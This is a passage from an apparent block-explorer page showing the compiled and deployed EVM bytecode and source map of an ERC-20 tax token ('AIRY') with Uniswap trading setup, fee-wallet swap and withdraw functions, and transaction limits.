384165f9081526001602052604090205461169d9083611500565b6001600160a01b038086165f9081526001602052604080822093909355908516815220546116cb9082611541565b6001600160a01b038085165f8181526001602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061171e9085815260200190565b60405180910390a350505050565b5f602080835283518060208501525f5b818110156117585785810183015185820160400152820161173c565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146109ed575f80fd5b5f806040838503121561179d575f80fd5b82356117a881611778565b946020939093013593505050565b5f805f606084860312156117c8575f80fd5b83356117d381611778565b925060208401356117e381611778565b929592945050506040919091013590565b5f60208284031215611804575f80fd5b813561147a81611778565b5f8060408385031215611820575f80fd5b823561182b81611778565b9150602083013561183b81611778565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561189457815f190482111561187a5761187a611846565b8085161561188757918102915b93841c939080029061185f565b509250929050565b5f826118aa575060016103d5565b816118b657505f6103d5565b81600181146118cc57600281146118d6576118f2565b60019150506103d5565b60ff8411156118e7576118e7611846565b50506001821b6103d5565b5060208310610133831016604e8410600b8410161715611915575081810a6103d5565b61191f838361185a565b805f190482111561193257611932611846565b029392505050565b5f61147a60ff84168361189c565b80820281158282048414176103d5576103d5611846565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f602082840312156119a4575f80fd5b815161147a81611778565b5f805f606084860312156119c1575f80fd5b8351925060208401519150604084015190509250925092565b5f602082840312156119ea575f80fd5b8151801515811461147a575f80fd5b808201808211156103d5576103d5611846565b5f60018201611a1d57611a1d611846565b5060010190565b818103818111156103d5576103d5611846565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015611a9b5784516001600160a01b031683529383019391830191600101611a76565b50506001600160a01b03969096166060850152505050608001529392505050565b5f82611ad657634e487b7160e01b5f52601260045260245ffd5b50049056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220af929b89b2708fa954a55fd92b9dbe7c61db6f9dfa7739d971c7df208c81f56264736f6c63430008170033

Deployed Bytecode

0x60806040526004361061011e575f3560e01c80637d1db4a51161009d578063bf474bed11610062578063bf474bed14610325578063c9567bf91461033a578063dd62ed3e1461034e578063e139758614610392578063f2fde38b146103a6575f80fd5b80637d1db4a51461028a5780638da5cb5b1461029f5780638f9a55c0146102c557806395d89b41146102da578063a9059cbb14610306575f80fd5b8063313ce567116100e3578063313ce567146101fd57806351bc3c851461021857806370a082311461022e578063715018a614610262578063751039fc14610276575f80fd5b806306fdde0314610129578063095ea7b3146101785780630faee56f146101a757806318160ddd146101ca57806323b872dd146101de575f80fd5b3661012557005b5f80fd5b348015610134575f80fd5b506040805180820190915260158152741052481495d048165a595b1908141c9bdd1bd8dbdb605a1b60208201525b60405161016f919061172c565b60405180910390f35b348015610183575f80fd5b5061019761019236600461178c565b6103c5565b604051901515815260200161016f565b3480156101b2575f80fd5b506101bc60105481565b60405190815260200161016f565b3480156101d5575f80fd5b506101bc6103db565b3480156101e9575f80fd5b506101976101f83660046117b6565b6103fc565b348015610208575f80fd5b506040516009815260200161016f565b348015610223575f80fd5b5061022c610463565b005b348015610239575f80fd5b506101bc6102483660046117f4565b6001600160a01b03165f9081526001602052604090205490565b34801561026d575f80fd5b5061022c6104b4565b348015610281575f80fd5b5061022c61052e565b348015610295575f80fd5b506101bc600d5481565b3480156102aa575f80fd5b505f546040516001600160a01b03909116815260200161016f565b3480156102d0575f80fd5b506101bc600e5481565b3480156102e5575f80fd5b506040805180820190915260048152634149525960e01b6020820152610162565b348015610311575f80fd5b5061019761032036600461178c565b6105e2565b348015610330575f80fd5b506101bc600f5481565b348015610345575f80fd5b5061022c6105ee565b348015610359575f80fd5b506101bc61036836600461180f565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b34801561039d575f80fd5b5061022c610998565b3480156103b1575f80fd5b5061022c6103c03660046117f4565b6109f0565b5f6103d1338484610ad7565b5060015b92915050565b5f6103e86009600a61193a565b6103f79064174876e800611948565b905090565b5f610408848484610bfb565b610459843361045485604051806060016040528060288152602001611adc602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190611180565b610ad7565b5060019392505050565b6004546001600160a01b0316336001600160a01b031614610482575f80fd5b305f9081526001602052604090205480156104a0576104a0816111b8565b4780156104b0576104b081611322565b5050565b5f546001600160a01b031633146104e65760405162461bcd60e51b81526004016104dd9061195f565b60405180910390fd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146105575760405162461bcd60e51b81526004016104dd9061195f565b6105636009600a61193a565b6105729064174876e800611948565b600d556105816009600a61193a565b6105909064174876e800611948565b600e557f947f344d56e1e8c70dc492fb94c4ddddd490c016aab685f5e7e47b2e85cb44cf6105c06009600a61193a565b6105cf9064174876e800611948565b60405190815260200160405180910390a1565b5f6103d1338484610bfb565b5f546001600160a01b031633146106175760405162461bcd60e51b81526004016104dd9061195f565b60165460ff161561066a5760405162461bcd60e51b815260206004820152601760248201527f74726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064016104dd565b601280546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556106b49030906106a56009600a61193a565b6104549064174876e800611948565b60125f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610704573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107289190611994565b6001600160a01b031663c9c653963060125f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610787573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906107ab9190611994565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156107f5573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108199190611994565b601380546001600160a01b039283166001600160a01b03199091161790556016805460ff191660011790556012541663f305d719473061086d816001600160a01b03165f9081526001602052604090205490565b5f806108805f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156108e6573d5f803e3d5ffd5b50505050506040513d601f19601f8201168201806040525081019061090b91906119af565b505060135460125460405163095ea7b360e01b81526001600160a01b0391821660048201525f1960248201529116915063095ea7b3906044016020604051808303815f875af1158015610960573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061098491906119da565b506016805462ff0000191662010000179055565b6004546001600160a01b0316336001600160a01b0316146109b7575f80fd5b6004546040516001600160a01b03909116904780156108fc02915f818181858888f193505050501580156109ed573d5f803e3d5ffd5b50565b5f546001600160a01b03163314610a195760405162461bcd60e51b81526004016104dd9061195f565b6001600160a01b038116610a7e5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104dd565b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b038316610b395760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104dd565b6001600160a01b038216610b9a5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104dd565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610c5f5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104dd565b6001600160a01b038216610cc15760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104dd565b5f8111610d225760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016104dd565b601654610100900460ff1680610d3b575060165460ff16155b15610d5057610d4b838383611359565b505050565b5f80546001600160a01b03858116911614801590610d7b57505f546001600160a01b03848116911614155b8015610d9557506004546001600160a01b03848116911614155b15610feb57610dc66064610dc0600954600c5411610db557600554610db9565b6007545b85906113fc565b90611481565b6013549091506001600160a01b038581169116148015610df457506012546001600160a01b03848116911614155b8015610e1857506001600160a01b0383165f9081526003602052604090205460ff16155b15610efe57600d54821115610e6f5760405162461bcd60e51b815260206004820152601960248201527f4578636565647320746865205f6d61785478416d6f756e742e0000000000000060448201526064016104dd565b600e5482610e91856001600160a01b03165f9081526001602052604090205490565b610e9b91906119f9565b1115610ee95760405162461bcd60e51b815260206004820152601a60248201527f4578636565647320746865206d617857616c6c657453697a652e00000000000060448201526064016104dd565b600c8054905f610ef883611a0c565b91905055505b6013546001600160a01b038481169116148015610f2457506001600160a01b0384163014155b15610f5157610f4e6064610dc0600a54600c5411610f4457600654610db9565b60085485906113fc565b90505b305f90815260016020526040902054601654610100900460ff16158015610f8557506013546001600160a01b038581169116145b8015610f99575060165462010000900460ff165b8015610fa65750600f5481115b8015610fb55750600b54600c54115b15610fe957610fd7610fd284610fcd846010546114c2565b6114c2565b6111b8565b478015610fe757610fe747611322565b505b505b6001600160a01b0384165f9081526003602052604090205460ff168061102857506001600160a01b0383165f9081526003602052604090205460ff165b801561103d57506001600160a01b0384163014155b801561105257506001600160a01b0383163014155b1561105c57436015555b6001600160a01b0384165f9081526003602052604090205460ff1615801561109c57506001600160a01b0383165f9081526003602052604090205460ff16155b1561116e576013546001600160a01b03908116908416036110ee576001600160a01b0384165f90815260116020526040902060155481546110dd9190611a24565b60028201554260019091015561116e565b6001600160a01b038084165f908152601160205260409020601354909186811691160361113a5780545f0361113557600c54600b54101561112f5743611132565b5f195b81555b61116c565b6001600160a01b0385165f90815260116020526040902081541580611160575081548154105b1561116a57805482555b505b505b61117a848483856114d6565b50505050565b5f81848411156111a35760405162461bcd60e51b81526004016104dd919061172c565b505f6111af8486611a24565b95945050505050565b6016805461ff0019166101001790556040805160028082526060820183525f9260208301908036833701905050905030815f815181106111fa576111fa611a37565b6001600160a01b03928316602091820292909201810191909152601254604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611251573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906112759190611994565b8160018151811061128857611288611a37565b6001600160a01b0392831660209182029290920101526012546112ae9130911684610ad7565b60125460405163791ac94760e01b81526001600160a01b039091169063791ac947906112e69085905f90869030904290600401611a4b565b5f604051808303815f87803b1580156112fd575f80fd5b505af115801561130f573d5f803e3d5ffd5b50506016805461ff001916905550505050565b6004546040516001600160a01b039091169082156108fc029083905f818181858888f193505050501580156104b0573d5f803e3d5ffd5b6001600160a01b0383165f9081526001602052604090205461137b9082611500565b6001600160a01b038085165f9081526001602052604080822093909355908416815220546113a99082611541565b6001600160a01b038084165f8181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610bee9085815260200190565b5f825f0361140b57505f6103d5565b5f6114168385611948565b9050826114238583611abc565b1461147a5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016104dd565b9392505050565b5f61147a83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061159f565b5f8183116114d0578261147a565b50919050565b5f6114e28583856115cb565b90506114f98585836114f48688611500565b61167b565b5050505050565b5f61147a83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611180565b5f8061154d83856119f9565b90508381101561147a5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016104dd565b5f81836115bf5760405162461bcd60e51b81526004016104dd919061172c565b505f6111af8486611abc565b6004545f9081906001600160a01b03908116908616036115f7576014546115f290856113fc565b6115f9565b835b9050821561167357305f9081526001602052604090205461161a9084611541565b305f81815260016020526040908190209290925590516001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061166a9087815260200190565b60405180910390a35b949350505050565b6001600160a01b0384165f9081526001602052604090205461169d9083611500565b6001600160a01b038086165f9081526001602052604080822093909355908516815220546116cb9082611541565b6001600160a01b038085165f8181526001602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061171e9085815260200190565b60405180910390a350505050565b5f602080835283518060208501525f5b818110156117585785810183015185820160400152820161173c565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146109ed575f80fd5b5f806040838503121561179d575f80fd5b82356117a881611778565b946020939093013593505050565b5f805f606084860312156117c8575f80fd5b83356117d381611778565b925060208401356117e381611778565b929592945050506040919091013590565b5f60208284031215611804575f80fd5b813561147a81611778565b5f8060408385031215611820575f80fd5b823561182b81611778565b9150602083013561183b81611778565b809150509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561189457815f190482111561187a5761187a611846565b8085161561188757918102915b93841c939080029061185f565b509250929050565b5f826118aa575060016103d5565b816118b657505f6103d5565b81600181146118cc57600281146118d6576118f2565b60019150506103d5565b60ff8411156118e7576118e7611846565b50506001821b6103d5565b5060208310610133831016604e8410600b8410161715611915575081810a6103d5565b61191f838361185a565b805f190482111561193257611932611846565b029392505050565b5f61147a60ff84168361189c565b80820281158282048414176103d5576103d5611846565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b5f602082840312156119a4575f80fd5b815161147a81611778565b5f805f606084860312156119c1575f80fd5b8351925060208401519150604084015190509250925092565b5f602082840312156119ea575f80fd5b8151801515811461147a575f80fd5b808201808211156103d5576103d5611846565b5f60018201611a1d57611a1d611846565b5060010190565b818103818111156103d5576103d5611846565b634e487b7160e01b5f52603260045260245ffd5b5f60a08201878352602087602085015260a0604085015281875180845260c0860191506020890193505f5b81811015611a9b5784516001600160a01b031683529383019391830191600101611a76565b50506001600160a01b03969096166060850152505050608001529392505050565b5f82611ad657634e487b7160e01b5f52601260045260245ffd5b50049056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220af929b89b2708fa954a55fd92b9dbe7c61db6f9dfa7739d971c7df208c81f56264736f6c63430008170033

Deployed Bytecode Sourcemap

8782:9882:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10770:83;;;;;;;;;;-1:-1:-1;10840:5:0;;;;;;;;;;;;-1:-1:-1;;;10840:5:0;;;;10770:83;;;;;;;:::i;:::-;;;;;;;;11862:161;;;;;;;;;;-1:-1:-1;11862:161:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;11862:161:0;1023:187:1;9844:54:0;;;;;;;;;;;;;;;;;;;1361:25:1;;;1349:2;1334:18;9844:54:0;1215:177:1;11047:95:0;;;;;;;;;;;;;:::i;12031:363::-;;;;;;;;;;-1:-1:-1;12031:363:0;;;;;:::i;:::-;;:::i;10956:83::-;;;;;;;;;;-1:-1:-1;10956:83:0;;9448:1;2000:36:1;;1988:2;1973:18;10956:83:0;1858:184:1;18164:352:0;;;;;;;;;;;;;:::i;:::-;;11150:119;;;;;;;;;;-1:-1:-1;11150:119:0;;;;;:::i;:::-;-1:-1:-1;;;;;11243:18:0;11216:7;11243:18;;;:9;:18;;;;;;;11150:119;8374:147;;;;;;;;;;;;;:::i;17248:160::-;;;;;;;;;;;;;:::i;9649:56::-;;;;;;;;;;;;;;;;8160:79;;;;;;;;;;-1:-1:-1;8198:7:0;8225:6;8160:79;;-1:-1:-1;;;;;8225:6:0;;;2445:51:1;;2433:2;2418:18;8160:79:0;2299:203:1;9712:58:0;;;;;;;;;;;;;;;;10861:87;;;;;;;;;;-1:-1:-1;10933:7:0;;;;;;;;;;;;-1:-1:-1;;;10933:7:0;;;;10861:87;;11277:167;;;;;;;;;;-1:-1:-1;11277:167:0;;;;;:::i;:::-;;:::i;9777:60::-;;;;;;;;;;;;;;;;17553:603;;;;;;;;;;;;;:::i;11452:143::-;;;;;;;;;;-1:-1:-1;11452:143:0;;;;;:::i;:::-;-1:-1:-1;;;;;11560:18:0;;;11533:7;11560:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11452:143;18524:137;;;;;;;;;;;;;:::i;8529:244::-;;;;;;;;;;-1:-1:-1;8529:244:0;;;;;:::i;:::-;;:::i;11862:161::-;11937:4;11954:39;6001:10;11977:7;11986:6;11954:8;:39::i;:::-;-1:-1:-1;12011:4:0;11862:161;;;;;:::o;11047:95::-;11100:7;9506:13;9448:1;9506:2;:13;:::i;:::-;9491:28;;:12;:28;:::i;:::-;11120:14;;11047:95;:::o;12031:363::-;12129:4;12146:36;12156:6;12164:9;12175:6;12146:9;:36::i;:::-;12193:171;12216:6;6001:10;12264:89;12302:6;12264:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;12264:19:0;;;;;;:11;:19;;;;;;;;6001:10;12264:33;;;;;;;;;;:37;:89::i;:::-;12193:8;:171::i;:::-;-1:-1:-1;12382:4:0;12031:363;;;;;:::o;18164:352::-;18228:10;;-1:-1:-1;;;;;18228:10:0;6001;-1:-1:-1;;;;;18214:24:0;;18206:33;;;;;;18291:4;18250:20;11243:18;;;:9;:18;;;;;;18311:14;;18308:73;;18339:30;18356:12;18339:16;:30::i;:::-;18412:21;18447:12;;18444:65;;18473:24;18486:10;18473:12;:24::i;:::-;18195:321;;18164:352::o;8374:147::-;8287:6;;-1:-1:-1;;;;;8287:6:0;6001:10;8287:22;8279:67;;;;-1:-1:-1;;;8279:67:0;;;;;;;:::i;:::-;;;;;;;;;8480:1:::1;8465:6:::0;;8444:39:::1;::::0;-1:-1:-1;;;;;8465:6:0;;::::1;::::0;8444:39:::1;::::0;8480:1;;8444:39:::1;8511:1;8494:19:::0;;-1:-1:-1;;;;;;8494:19:0::1;::::0;;8374:147::o;17248:160::-;8287:6;;-1:-1:-1;;;;;8287:6:0;6001:10;8287:22;8279:67;;;;-1:-1:-1;;;8279:67:0;;;;;;;:::i;:::-;9506:13:::1;9448:1;9506:2;:13;:::i;:::-;9491:28;::::0;:12:::1;:28;:::i;:::-;17302:12;:21:::0;9506:13:::1;9448:1;9506:2;:13;:::i;:::-;9491:28;::::0;:12:::1;:28;:::i;:::-;17334:14;:23:::0;17373:27:::1;9506:13;9448:1;9506:2;:13;:::i;:::-;9491:28;::::0;:12:::1;:28;:::i;:::-;17373:27;::::0;1361:25:1;;;1349:2;1334:18;17373:27:0::1;;;;;;;17248:160::o:0;11277:167::-;11355:4;11372:42;6001:10;11396:9;11407:6;11372:9;:42::i;17553:603::-;8287:6;;-1:-1:-1;;;;;8287:6:0;6001:10;8287:22;8279:67;;;;-1:-1:-1;;;8279:67:0;;;;;;;:::i;:::-;17617:11:::1;::::0;::::1;;17616:12;17608:47;;;::::0;-1:-1:-1;;;17608:47:0;;5145:2:1;17608:47:0::1;::::0;::::1;5127:21:1::0;5184:2;5164:18;;;5157:30;5223:25;5203:18;;;5196:53;5266:18;;17608:47:0::1;4943:347:1::0;17608:47:0::1;17666:6;:71:::0;;-1:-1:-1;;;;;;17666:71:0::1;17694:42;17666:71:::0;;::::1;::::0;;;17748:48:::1;::::0;17765:4:::1;::::0;9506:13:::1;9448:1;9506:2;:13;:::i;:::-;9491:28;::::0;:12:::1;:28;:::i;17748:48::-;17836:6;;;;;;;;;-1:-1:-1::0;;;;;17836:6:0::1;-1:-1:-1::0;;;;;17836:14:0::1;;:16;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;17818:46:0::1;;17873:4;17879:6;;;;;;;;;-1:-1:-1::0;;;;;17879:6:0::1;-1:-1:-1::0;;;;;17879:11:0::1;;:13;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;17818:75;::::0;-1:-1:-1;;;;;;17818:75:0::1;::::0;;;;;;-1:-1:-1;;;;;5781:15:1;;;17818:75:0::1;::::0;::::1;5763:34:1::0;5833:15;;5813:18;;;5806:43;5698:18;;17818:75:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;17807:8;:86:::0;;-1:-1:-1;;;;;17807:86:0;;::::1;-1:-1:-1::0;;;;;;17807:86:0;;::::1;;::::0;;17905:11:::1;:16:::0;;-1:-1:-1;;17905:16:0::1;17807:86:::0;17905:16:::1;::::0;;17932:6:::1;::::0;::::1;:22;17962:21;17993:4;17999:24;17993:4:::0;-1:-1:-1;;;;;11243:18:0;11216:7;11243:18;;;:9;:18;;;;;;;11150:119;17999:24:::1;18024:1;18026::::0;18028:7:::1;8198::::0;8225:6;-1:-1:-1;;;;;8225:6:0;;8160:79;18028:7:::1;17932:120;::::0;::::1;::::0;;;-1:-1:-1;;;;;;17932:120:0;;;-1:-1:-1;;;;;6219:15:1;;;17932:120:0::1;::::0;::::1;6201:34:1::0;6251:18;;;6244:34;;;;6294:18;;;6287:34;;;;6337:18;;;6330:34;6401:15;;;6380:19;;;6373:44;18036:15:0::1;6433:19:1::0;;;6426:35;6135:19;;17932:120:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;18071:8:0::1;::::0;18097:6:::1;::::0;18064:57:::1;::::0;-1:-1:-1;;;18064:57:0;;-1:-1:-1;;;;;18097:6:0;;::::1;18064:57;::::0;::::1;6957:51:1::0;-1:-1:-1;;7024:18:1;;;7017:34;18071:8:0;::::1;::::0;-1:-1:-1;18064:24:0::1;::::0;6930:18:1;;18064:57:0::1;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;18132:11:0::1;:16:::0;;-1:-1:-1;;18132:16:0::1;::::0;::::1;::::0;;17553:603::o;18524:137::-;18589:10;;-1:-1:-1;;;;;18589:10:0;6001;-1:-1:-1;;;;;18575:24:0;;18567:33;;;;;;18611:10;;:42;;-1:-1:-1;;;;;18611:10:0;;;;18631:21;18611:42;;;;;:10;:42;:10;:42;18631:21;18611:10;:42;;;;;;;;;;;;;;;;;;;;;18524:137::o;8529:244::-;8287:6;;-1:-1:-1;;;;;8287:6:0;6001:10;8287:22;8279:67;;;;-1:-1:-1;;;8279:67:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;8618:22:0;::::1;8610:73;;;::::0;-1:-1:-1;;;8610:73:0;;7546:2:1;8610:73:0::1;::::0;::::1;7528:21:1::0;7585:2;7565:18;;;7558:30;7624:34;7604:18;;;7597:62;-1:-1:-1;;;7675:18:1;;;7668:36;7721:19;;8610:73:0::1;7344:402:1::0;8610:73:0::1;8720:6;::::0;;8699:38:::1;::::0;-1:-1:-1;;;;;8699:38:0;;::::1;::::0;8720:6;::::1;::::0;8699:38:::1;::::0;::::1;8748:6;:17:::0;;-1:-1:-1;;;;;;8748:17:0::1;-1:-1:-1::0;;;;;8748:17:0;;;::::1;::::0;;;::::1;::::0;;8529:244::o;12402:335::-;-1:-1:-1;;;;;12495:19:0;;12487:68;;;;-1:-1:-1;;;12487:68:0;;7953:2:1;12487:68:0;;;7935:21:1;7992:2;7972:18;;;7965:30;8031:34;8011:18;;;8004:62;-1:-1:-1;;;8082:18:1;;;8075:34;8126:19;;12487:68:0;7751:400:1;12487:68:0;-1:-1:-1;;;;;12574:21:0;;12566:68;;;;-1:-1:-1;;;12566:68:0;;8358:2:1;12566:68:0;;;8340:21:1;8397:2;8377:18;;;8370:30;8436:34;8416:18;;;8409:62;-1:-1:-1;;;8487:18:1;;;8480:32;8529:19;;12566:68:0;8156:398:1;12566:68:0;-1:-1:-1;;;;;12645:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;12697:32;;1361:25:1;;;12697:32:0;;1334:18:1;12697:32:0;;;;;;;;12402:335;;;:::o;12745:2899::-;-1:-1:-1;;;;;12838:18:0;;12830:68;;;;-1:-1:-1;;;12830:68:0;;8761:2:1;12830:68:0;;;8743:21:1;8800:2;8780:18;;;8773:30;8839:34;8819:18;;;8812:62;-1:-1:-1;;;8890:18:1;;;8883:35;8935:19;;12830:68:0;8559:401:1;12830:68:0;-1:-1:-1;;;;;12917:16:0;;12909:64;;;;-1:-1:-1;;;12909:64:0;;9167:2:1;12909:64:0;;;9149:21:1;9206:2;9186:18;;;9179:30;9245:34;9225:18;;;9218:62;-1:-1:-1;;;9296:18:1;;;9289:33;9339:19;;12909:64:0;8965:399:1;12909:64:0;13006:1;12992:11;:15;12984:69;;;;-1:-1:-1;;;12984:69:0;;9571:2:1;12984:69:0;;;9553:21:1;9610:2;9590:18;;;9583:30;9649:34;9629:18;;;9622:62;-1:-1:-1;;;9700:18:1;;;9693:39;9749:19;;12984:69:0;9369:405:1;12984:69:0;13070:6;;;;;;;;:23;;-1:-1:-1;13082:11:0;;;;13080:13;13070:23;13066:113;;;13109:37;13124:4;13130:2;13134:11;13109:14;:37::i;:::-;12745:2899;;;:::o;13066:113::-;13191:17;8225:6;;-1:-1:-1;;;;;13226:15:0;;;8225:6;;13226:15;;;;:32;;-1:-1:-1;8198:7:0;8225:6;-1:-1:-1;;;;;13245:13:0;;;8225:6;;13245:13;;13226:32;:51;;;;-1:-1:-1;13267:10:0;;-1:-1:-1;;;;;13262:15:0;;;13267:10;;13262:15;;13226:51;13222:1232;;;13306:81;13383:3;13306:72;13333:15;;13323:9;;:25;13322:55;;13363:14;;13322:55;;;13350:12;;13322:55;13306:11;;:15;:72::i;:::-;:76;;:81::i;:::-;13415:8;;13294:93;;-1:-1:-1;;;;;;13408:15:0;;;13415:8;;13408:15;:40;;;;-1:-1:-1;13441:6:0;;-1:-1:-1;;;;;13427:21:0;;;13441:6;;13427:21;;13408:40;:68;;;;-1:-1:-1;;;;;;13455:21:0;;;;;;:17;:21;;;;;;;;13453:23;13408:68;13404:309;;;13520:12;;13505:11;:27;;13497:66;;;;-1:-1:-1;;;13497:66:0;;9981:2:1;13497:66:0;;;9963:21:1;10020:2;10000:18;;;9993:30;10059:27;10039:18;;;10032:55;10104:18;;13497:66:0;9779:349:1;13497:66:0;13621:14;;13606:11;13590:13;13600:2;-1:-1:-1;;;;;11243:18:0;11216:7;11243:18;;;:9;:18;;;;;;;11150:119;13590:13;:27;;;;:::i;:::-;:45;;13582:85;;;;-1:-1:-1;;;13582:85:0;;10465:2:1;13582:85:0;;;10447:21:1;10504:2;10484:18;;;10477:30;10543:28;10523:18;;;10516:56;10589:18;;13582:85:0;10263:350:1;13582:85:0;13686:9;:11;;;:9;:11;;;:::i;:::-;;;;;;13404:309;13738:8;;-1:-1:-1;;;;;13732:14:0;;;13738:8;;13732:14;:38;;;;-1:-1:-1;;;;;;13750:20:0;;13765:4;13750:20;;13732:38;13729:174;;;13803:84;13883:3;13803:75;13830:16;;13820:9;;:26;13819:58;;13862:15;;13819:58;;;13848:13;;13803:11;;:15;:75::i;:84::-;13791:96;;13729:174;13968:4;13919:28;11243:18;;;:9;:18;;;;;;13996:6;;;;;;;13995:7;:24;;;;-1:-1:-1;14011:8:0;;-1:-1:-1;;;;;14006:13:0;;;14011:8;;14006:13;13995:24;:57;;;;-1:-1:-1;14041:11:0;;;;;;;13995:57;:100;;;;;14078:17;;14056:20;:39;13995:100;:132;;;;;14109:18;;14099:9;;:28;13995:132;13991:452;;;14162:74;14179:56;14183:11;14196:38;14200:20;14222:11;;14196:3;:38::i;:::-;14179:3;:56::i;:::-;14162:16;:74::i;:::-;14284:21;14328:20;;14324:104;;14373:35;14386:21;14373:12;:35::i;:::-;14143:300;13991:452;13279:1175;13222:1232;-1:-1:-1;;;;;14471:23:0;;;;;;:17;:23;;;;;;;;;:48;;-1:-1:-1;;;;;;14498:21:0;;;;;;:17;:21;;;;;;;;14471:48;14470:73;;;;-1:-1:-1;;;;;;14524:19:0;;14538:4;14524:19;;14470:73;:93;;;;-1:-1:-1;;;;;;14546:17:0;;14558:4;14546:17;;14470:93;14466:154;;;14596:12;14581;:27;14466:154;-1:-1:-1;;;;;14635:23:0;;;;;;:17;:23;;;;;;;;14634:24;:50;;;;-1:-1:-1;;;;;;14663:21:0;;;;;;:17;:21;;;;;;;;14662:22;14634:50;14630:946;;;14712:8;;-1:-1:-1;;;;;14712:8:0;;;14706:14;;;;14702:863;;-1:-1:-1;;;;;14776:18:0;;14741:32;14776:18;;;:12;:18;;;;;14851:12;;14833:17;;:30;;14851:12;14833:30;:::i;:::-;14813:17;;;:50;14903:15;14882:18;;;;:36;14702:863;;;-1:-1:-1;;;;;14996:16:0;;;14959:34;14996:16;;;:12;:16;;;;;15035:8;;14996:16;;15035;;;:8;;:16;15031:519;;15080:19;;;:24;15076:166;;15174:9;;15154:18;;:29;;:64;;15206:12;15154:64;;;-1:-1:-1;;15154:64:0;